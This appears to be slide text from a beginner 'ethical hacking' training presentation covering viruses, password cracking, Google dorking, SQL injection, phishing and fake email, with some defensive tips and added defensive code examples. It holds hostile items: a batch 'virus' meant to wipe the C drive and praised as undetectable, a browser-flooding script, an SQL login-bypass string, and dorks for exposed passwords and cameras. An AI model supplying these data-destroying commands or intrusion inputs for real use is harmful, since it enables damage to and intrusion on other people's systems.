
INFORMATION SECURITY

How secure are you?

Agenda

Networks Exposure to Security Threats
What is Information Security And Ethical Hacking
Two Major Aspects - Desktop & Internet Security
Live Demonstrations of Attacks

Networks Exposures To Threats

By the end of 2015, 95% of enterprises will be infected with undetected, financially motivated, targeted threats that evaded their traditional perimeter and host defenses - By Gartner, Top Ten Key Predictions, 2012

security predictions

Two Major Aspects Of Security

Desktop and internet

Make Dangerous Virus In A Minute
We will create this virus using batch file programming. This virus will delete the C Drive
completely. The good thing about this virus is that it is not detected by antivirus.

1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

Cracking Login Password

The Passwords are stored in SAM file

Cracking Tools :
ERD Commander
PH Crack
and many more

SAM = Security

OR we can Change the Password

C:\> net user username password


You need the admin rights!
But you can change Passwords of Other Admin Users!

That's easy but admin rights

Virus & Worms
Trojan Horse
Keylogger

The three major threats to computer

Symptoms

The system might start hanging.
Software and applications often start crashing.
System may become unpredictable.

AND

Worms
These generally don't perform any malicious activity.
They reside in the system and make copies of themselves.
These eat up the system resources.
In some extreme cases the OS may also crash.

Today almost 87% of all viruses/worms

Let's Code a Virus!

Is it difficult?

Trojan Horse
A Trojan is an infection that steals information.
It then sends the information to a specified location over the internet.
It makes the computer prone to hackers by making Backdoors.

Attacker

Trojan is a fatal

Victim

KEYLOGGER

They log all the keys that you type.
This runs in the background and is totally invisible.
Trojans often have the keyloggers with them and they mail the log to their masters.

Watch your key

Windows Registry
All initialization and configuration information used by Windows is stored in the registry.

Know how change in registries effects

Network Scanners
Network scanners are used to find all the live systems present in the network, with information about IP address, port number, services running on those ports, vulnerabilities, installed applications, etc.
Some Tools: Angry IP Scanner, GFI LAN Guard, Look At LAN

Finding live Hosts!

Sniffers
Sniffers are used to capture data packets from the network by applying some poisoning, such as ARP poisoning.
Some Tools: Cain and Abel, Ettercap

hmmmmmmmmmm

Cryptography
Art of secret writing to convert plaintext (readable format) into ciphertext (non-readable format) by using some algorithm with the help of a key.

Encrypters!

Steganography
Art of secret writing to hide one file behind another file. For example, a text message can be bound behind an image or video file.

Hiding..

How Do I Protect My Data?

Use Antiviruses with Updated Signatures
Use Firewalls
Do not open Untrusted executables
Use Cryptography Techniques

I will mess it up!

Let's move to internet
World Wide Web

Web Developer's Nightmare

Remote System Scanning
Google Hacking
DNS Spoofing
SQL Injection
DOS Attack

Website Exploits

Google Cracking
Using Google
Google is more than just a Search Engine.
Special keywords can perform better Searches.
<Google Commands>
site, intitle, filetype, allintitle, inurl

Google crawls the web

Database Cracking

Hmmmmmmmmmmm.

Advance Googling

Filetype:xls hry.nic.in

Password Cracking

Intitle:index .of

Camera Cracking

Inurl:indexframe.shtml axis

Backend SQL string

SQL attack

"Select * from table where user='" & TextBox1.Text & "' AND pass='" & TextBox2.Text & "';"

' OR '1'='1

String after SQL Injection


Select * from table where user='' OR '1'='1' AND pass='' OR '1'='1';

We Know that is always True!

user='' OR '1'='1' AND pass='' OR '1'='1';
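The concatenated backend string from the slide next to its parameterized form, as an added example that is not part of the original slides. It assumes Python's built-in sqlite3 module, and the users table, its columns and the sample row are constructed for illustration.

```python
import sqlite3

PAYLOAD = "' OR '1'='1"  # the input shown on the slide

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return db

def login_concat(db, user, password):
    # Same pattern as the slide's backend string: input becomes SQL text.
    sql = ("SELECT * FROM users WHERE user='" + user +
           "' AND pass='" + password + "'")
    return db.execute(sql).fetchall()

def login_param(db, user, password):
    # Hardened form: placeholders bind input as values, never as syntax.
    sql = "SELECT * FROM users WHERE user=? AND pass=?"
    return db.execute(sql, (user, password)).fetchall()

def compare():
    db = make_db()
    results = {
        "concat_valid": login_concat(db, "alice", "s3cret"),
        "concat_payload": login_concat(db, PAYLOAD, PAYLOAD),
        "param_valid": login_param(db, "alice", "s3cret"),
        "param_payload": login_param(db, PAYLOAD, PAYLOAD),
    }
    try:
        # A harmless apostrophe also breaks the concatenated statement.
        login_concat(db, "O'Brien", "x")
        results["concat_apostrophe"] = "ok"
    except sqlite3.OperationalError:
        results["concat_apostrophe"] = "syntax error"
    results["param_apostrophe"] = login_param(db, "O'Brien", "x")
    return results

if __name__ == "__main__":
    for name, value in compare().items():
        print(f"{name}: {value}")
```

The concatenated login returns the stored row for the slide's input, while the parameterized login returns nothing for it and still accepts the valid credentials.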

Let's see how a simple SQL

Let's see how this is done!

Surfing Online
Browser Hacking
Phishing
Fake Emails
Social Networking Abuse

Dangers for Internet Users

Browser Cracking
Use script links to run in the browser.
These scripts change the behavior of the browser.
Example:
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300;
y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function
A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute';
DIS.left=Math.sin (R*x1+i*x2+x3)*x4+x5;
DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0)

javascript:b=[]; a=document.images; for(wt=0; wt<a.length; wt++)
{a[wt].style.position='relative'; b[b.length]=a[wt]}; j=0; setInterval('j++;
for(wt=0; wt<b.length; wt++)
{b[wt].style.left=Math.sin((6.28/a.length)*wt+j/10)*10}; void(0)',1);
void(0);

Let's Do It.........

Blast Virus
<html>
<body>
<script language="javascript">
while(1)
{
w1=window.open();
w1.document.write("<center><font color=red size=5>
blaaaast!!</font></center>");
}
</script>
</body>
</html>

Let's Do It.........

Fake Emails
Sending fake mails with fake headers
E-mails can be sent to anyone from any ID
It is also used in spamming

Let's Send a Fake Email!

It's bush@georgebush.com

How to Catch Fake Emailers

Analyze the headers
Use sites like whatismyipaddress.com to trace the IP address of the fake mail
Go to Regional Internet Registries like APNIC, AFRINIC, etc.
Get the email of the attacker's ISP & lodge the complaint.
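One way to do the header analysis step, as an added example that is not part of the original slides: it reads the Received chain newest-first and returns the address recorded by the last server you control, since any Received line written before that point comes from the sender's side and can be forged. The message, host names and addresses are constructed (documentation IP ranges), and the set of trusted hosts is an assumption you would replace with your own mail servers.

```python
import re
from email import message_from_string

# Constructed sample message; hosts and addresses are placeholders.
RAW = """\
Received: from mx.example.net (mx.example.net [10.0.0.5])
\tby mailstore.example.net with ESMTP; Mon, 1 Jan 2024 10:00:03 +0000
Received: from mail.sender.test (unknown [203.0.113.77])
\tby mx.example.net with ESMTP; Mon, 1 Jan 2024 10:00:02 +0000
Received: from relay.invalid (relay.invalid [198.51.100.1])
\tby mail.sender.test with SMTP; Mon, 1 Jan 2024 09:59:00 +0000
From: ceo@bank.example
To: user@example.net
Subject: hello

body
"""

# "from <name> ... [<ip>] ... by <host>" inside one (possibly folded) header
HOP = re.compile(r"from\s+(\S+).*?\[([0-9A-Fa-f.:]+)\].*?\bby\s+(\S+)", re.S)

def hops(raw):
    """Return (claimed_name, ip, by_host) per Received header, newest first."""
    msg = message_from_string(raw)
    found = []
    for value in msg.get_all("Received", []):
        match = HOP.search(value)
        if match:
            found.append(match.groups())
    return found

def handoff_ip(raw, trusted_hosts):
    """IP that delivered the mail to the first server we control."""
    result = None
    for _name, ip, by_host in hops(raw):
        if by_host not in trusted_hosts:
            break  # written by a server we do not control: may be forged
        result = ip
    return result

if __name__ == "__main__":
    ours = {"mx.example.net", "mailstore.example.net"}  # assumed own servers
    print("address to look up at the registry:", handoff_ip(RAW, ours))
```

The returned address is the one to look up at the regional registry; the oldest Received line in the sample is ignored because it was added outside the trusted servers.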

Catch me if u can

Phishing Attack
E-mail: There's a problem with your Gmail account
Password

sent

Password?

User thinks it's Gmail.com (But it's Gmail.org)

Let's make a fake page

Preventing Phishing

Read the URL carefully
Keep a suspicious eye over info demanding E-mails.
Anti-phishing Tools can be effective
Use your Brain
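"Read the URL carefully" as a mechanical check, in an added example that is not part of the original slides: it compares the host a link really points to with the domain the message claims, covering the Gmail.com versus Gmail.org case above and a few common disguises. The function name, verdict labels and sample links are constructed for illustration.

```python
from urllib.parse import urlsplit

def check_link(url, expected):
    """Classify a link against the domain the message claims to come from."""
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".")   # hostname is already lowercased
    if not host:
        return "no-host"
    if any(label.startswith("xn--") for label in host.split(".")):
        return "punycode"        # encoded non-ASCII name: possible look-alike
    if host == expected or host.endswith("." + expected):
        return "match" if parts.scheme == "https" else "match-insecure"
    brand = expected.split(".")[0]
    if brand in url.lower():
        return "lookalike"       # expected name shows up, but is not the host
    return "different"

# Constructed sample links
SAMPLES = [
    "https://mail.gmail.com/inbox",        # real subdomain
    "http://gmail.org/login",              # other top-level domain
    "https://gmail.com@gmail.org/",        # expected name hidden in userinfo
    "https://gmail.com.evil.example/",     # expected name used as a prefix
    "https://xn--gmil-6na.com/",           # punycode label
]

if __name__ == "__main__":
    for link in SAMPLES:
        print(f"{check_link(link, 'gmail.com'):15} {link}")
```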

Thank You
For any query and assistance,
Kindly contact:
Appin Technology lab

This is just a Trailer movie is about
